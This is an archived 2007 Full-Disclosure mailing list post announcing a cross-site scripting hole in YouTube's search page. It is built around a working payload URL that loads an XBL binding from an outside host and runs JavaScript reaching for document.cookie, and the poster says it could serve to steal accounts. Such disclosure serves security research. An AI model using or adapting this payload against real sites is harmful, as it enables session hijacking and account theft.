lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <3d3168e50712140642i6f0f46d0iaed6241bf4e5bfc6@mail.gmail.com> Date: Fri, 14 Dec 2007 15:42:01 +0100 From: "Michal Majchrowicz" <m.majchrowicz@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: XSS in YouTube.com I discovered it just while waiting for my video to download :) http://youtube.com/results?search_query=test+'test%22%%20style=-moz-binding:url('http://sectroyer.110mb.com/xss.xml%23xss')%20style=background:url(javascript:alert(document.cookie))%20test=test Besides stealing YouTube accounts I don't think it can be used for something serious. Just post it here in case anyone is interested. Regards Michal. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/